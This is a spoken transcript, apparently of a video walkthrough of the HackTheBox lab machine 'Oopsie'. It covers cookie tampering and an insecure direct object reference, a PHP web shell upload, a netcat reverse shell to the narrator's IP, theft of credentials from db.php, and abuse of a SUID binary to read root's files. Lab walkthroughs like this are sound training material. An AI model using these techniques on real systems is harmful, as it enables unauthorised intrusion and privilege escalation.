Ho-ho! I'm back again. We are doing another tier 2 starting point machine on HackTheBox. This time we're doing Oopsie, which is the second one, and we are well on our way to getting onto that Crest CRT track on HackTheBox. Exciting times. I have no announcements, no anything. I guess thanks for 25 subscribers. Very cool. Maybe I'll have more when this video drops, but maybe not. Who knows? Anyway, let's just get straight into the video. Why not? Okay, so we are back. How many machines are there? Oh, there's not many. I reckon I'll have this done by next week. Oh my gosh. And we start doing CRT. Already got a CRT though, so. We will move straight on to the CCT after that. Okay, our box has spawned. So, let's get going. Question number 1. With what kind of tool can we intercept web traffic? The answer to that is a proxy, and a proxy is something like Burp Suite. We've used Burp Suite in the past. You understand what a proxy is. Easy. Question number 2. What is the path to the directory on the web server that returns a login page? Let's go find out. So we can go to the web server like this. Okay, we have Megacorp Automotive. These don't really go anywhere. Learn more. Okay, nothing interesting. Is there anything down here? We have admin at Megacorp as a possible username. I'm not writing it down anywhere, but it doesn't seem that there's anything interesting. So I reckon we're gonna have to do a directory busting. So we're gonna do Ferox Buster. Jeez, if I can type Buster-K, because we don't care about it being insecure. Oh wait, actually it doesn't matter. We're gonna do -u, and then we're gonna do http:// and then the IP address of the box. It's gonna go and find stuff. Okay, so we found an uploads directory. That could be quite interesting. Let's see if we can go and have a look in there. Seems to be a 301, so I don't know if we will be able to do that. Where do we get redirected to? Oh, I don't have permission. Okay, that's fine. That looks interesting. CDN CGI/login right there could be our answer. Let's go see if we can access that. CDN CGI/login is our login page right there. So I'll show you the answer now. Oh, so first answer was proxy. Second answer is CDN CGI login. So question number 3. What can be modified in Firefox to get access to the upload page? Right, let's have a look at that uploads page again. Nothing interesting here. You can see it's a blank page. Maybe we can look at our cookie. Maybe not. What could this be? Login as guest. Here we go. That could be interesting. Maybe that'll give us a login cookie and then we can... Okay, repair management system. All right, let's have a look. And they found a picture of my car somehow. I don't know how they found that. And now we can see that we have access to our account. We have an access ID of 2233. Name is guest. Email is guest at Megacorp. Oh, what? We saw admin at Megacorp before, so that's interesting. And then just looking around, you can see that there is that uploads folder. I don't know if we have... Okay, we need super admin rights. We don't have access to that. But what I am interested in is this URL. So content accounts, yes. Okay, that's fine. But we have ID is equal to 2. That should be screaming at you saying this could be insecure direct object reference. Because we're directly saying, show us the information for the user whose ID is 2. So now I'm thinking, can we just go to ID 1 and find that we have the admin right there? The answer is yes. Another thing I noticed was when I was looking at my cookies, we have a role here called guest, and we have a user ID of 2233, but 2233 was our guest ID. So going back to this, if we have a check and we change our cookie to 34322, then maybe that will do something for us. So let's just refresh. Does anything happen? No, we're still not an admin. But we do still keep our user ID, so maybe super admin. What was that? Was that what it was? Let's see if we can access uploads now. Okay, so you needed to change your role cookie to super admin as well. And the reason I knew it was super admin is because it said here, you need to have the super admin role in order to access this page. We are also now using the actual admin's access ID. So we are performing actions as that admin. So now we can access the uploads page. This could be very interesting, but let's first answer the questions. So question number 3, what can be modified by Firefox in order to get access to the upload page? Your cookie. Question number 4, what is the access ID of the admin user? We already saw that. I don't want to go back again, but I have it in our cookie. It is 34322. Question number 5, on uploading a file, what directory does that file appear in on the server? /uploads. We already knew that. We found it during our directory busting over here. Now, question number 6. What is the file that contains the password that is shared with the Robert user? This is where things get interesting. So let's just upload a random file. Do I still have... Okay, I have some PDF from when I was doing a very hard box. Oh, hold on. That I needed to give it a brand name. Whoops. Well, let's see if this still works. Sorry, it doesn't. Yeah, I thought there might be an error. Let's try that again. So I'm going to upload this, and we are going to just put the brand name as Jamie and upload. See what happens. There was an error uploading the file. Okay, that's annoying. Wonder why that is. Maybe we'll have a look with our proxy. Let us do that. Maybe uploads. Okay, so there was an error uploading my file. Branding image uploads. Okay, so it wants an image. Let's just grab a picture of a cat or something. Oh, such a cute kitty. I'm gonna save the image. Oh, why would I want a WebP file? Get out of here. You know I want a JPEG. That's also a very good cat. The origins of cats. Oh my gosh, I might have to read that later. So I'm gonna save the image, and it's a JPEG. Very nice. Cat.jpg. And we're going to see if I can now upload this cat.jpg file. Kitty. Cat.jpg file has been uploaded. Let's see if we can find it. So uploads slash cat.jpg. Is it that easy? It is that easy. So we found our cat. Why this is interesting is because we have a server that is running PHP and is taking file uploads that you can access directly. So now what we can do is we can have a look and we can find CMD at home. PHP web shell. We can upload a web shell to the server, and that means that we can execute commands as the server if everything goes right, you know? So now we've made a file called shell.php. As you can see, when I cat it, I have all of this information that I've just copied right here. So now I'm gonna go see if I can re-upload this file, or sorry, if I can actually upload this PHP shell directly to the server. Kitty2, Kitty23 doesn't really matter. Shell.php has been uploaded. So now let's go see if we can access uploads slash shell.php, and we can. So now we can say, who am I? Click execute, and we are www.data. Very nice. So, what is the file that contains the password that is shared with the Robert user? Let's have a look. I have a feeling it's going to be something like db.php. So, what I think I'm going to do is see if I have which NC. Okay, so that means that we can do this. So, if we run a reverse shell using netcat, so nclnvp 6969, we should be able to do this. --c nc 10.10.16.3 6969, that's my IP address and port, and we want to do bin or /bin/sh, and let's see if we can get that to run. Does it work? Invalid option E. Oh gosh, what's the actual option? Okay, well there's another way to do it. There's this way, so we are going to do --c and then chuck this in, and that is another potential way to do it. Ah, here we go. So now we have a shell. Who am I? Brilliant. We have a shell. So what was going on there is netcat wasn't working for some reason. So what I did instead was I just used a different shell on reverse shells. And this is a very basic reverse shell that you can just use. It uses pre-built commands on Linux, so can be run most of the time if you have some kind of web shell. But now we have a shell as www.data. I'm just going to upgrade it because I prefer having a nice interactive shell. Or a shell that tells me where I am. You can actually do this command to upgrade your shell a little bit, have it be a bit more attractive. So you can do import pty.spawn, and then /bin/bash, and make sure you close that, and now you have a proper shell where you can use things like SU. So what we were doing there was we were having a look around. So index.php themes uploads, not really super interesting. Okay, go back to HTML. Let's see if we can find any config files. So cdn-cgi. Login, maybe. Here we go, db.php. That is interesting to us. We have found that we have a user called Robert and his password is megacorp user. So now we can answer this question. The answer to question number 6 is db.php. Question number 7. What executable is run with the option group bug tracker to identify all the files owned by the bug tracker group? That is actually the find command, and it is how you search for files on your local Linux machine. But of course, we have this shell, so we're doing it from the perspective of the box we're trying to hack. I had to do a bit of Googling there, but what I found was the way you do this is you run find/ and then group bug tracker, and then you can send all the errors to the bin like that, And hopefully this will find all of the files that belong to the bug tracker group on the server. And let's just ls/la to see all the permissions, user bin bug tracker. And we can see that it is owned by root, and the bug tracker group has execute access on this file. I don't think I am in that group, so we're going to have to probably SU to that Robert user. But we can see that this weird bit is set here. What is S? So it's RWX usually. RWX. What does that mean? Well, when something has an S, it means the SUID bit is set on the file. And that means that no matter who runs this file, no matter who executes it, it is going to run as the owner. And in this case, the owner of the file is actually root. So if you're in the bug tracker group, it means you have execute privileges. But when you execute the file, since this sticky bit here is set, it will run as root, which is privilege escalation 101. That is very bad. So first of all, we want to find someone that's in the bug tracker group. How to find users in a group Linux. We do have getInt. So getInt group bug tracker. Let's see who's in it. We have Robert is in bug tracker, and we have Robert's password. So that means that we can sign in as Robert, and now we have access to this file. So, or access to execute this file. So now what I'm going to do is I'm going to SU as Robert. It's going to prompt me for his password, and then I'm going to take his password, and I'm going to paste it in, and then we are Robert. Now what I want to do is I just want to go to Robert's home and just see if there's a user flag right there. Okay, very good. I'm not going to reveal it. I'm past that stage of my life. I don't leave flags anymore. We now know that we can run user bin bug tracker as root. But what does bug tracker do? Let's go and have a read of the binary. So cat/user, not that type of user, bin bug tracker. It is a compiled binary, so it's a little bit messed up, but I will try running it anyway. Actually, let's answer questions first. So question number 8, regardless of which user runs the bug tracker executable, what user privileges will it use to run root? It's to do with that sticky bit, SUID bit, whatever you want to call it. Question number 9, what does SUID stand for? I don't actually know, let's Google it. SUID meaning Linux. Set user ID, very nice. So that kind of makes sense with what the actual thing does. Oh, set owner user ID. Okay, buddy. Okay, pal. Question number 10. What is the name of the executable being called in an insecure manner? Let's run bug tracker and just see if that reveals anything to us. Oh, my terminal is very messed up. I don't know if you're seeing that, but it's all overwritten itself. Can I clear? I can just do a bunch of these. That's better. Okay, so now we are going to do /user/bin/bug tracker and just see what happens. EV bug tracker, provide bug ID 123. Oh, we're using cat. Okay, so I just gave it a random ID, complete hunch, but you can see that cat is complaining that there's no such directory as reports 123. So we can see that we're using the cat binary. And now, this is where the privilege escalation comes in. So we know that this binary is running things as root, and by extension it's running cat as root. So if we go to GTFO bins, and then we search cat, we'll see that there is actually a way to do this. Reads data from files, cat file to read, cat L file. Let's see if we can just straight up give it a wrong file. So provide bug tracker ID /root.text. Just like that, we have the root flag, stop the clock, box is done. So that was a nice easy box. I hope you learned something today. That was a quick one. That was quick. I don't really know how to end this one, but I will see you in the next video. Hope you enjoyed.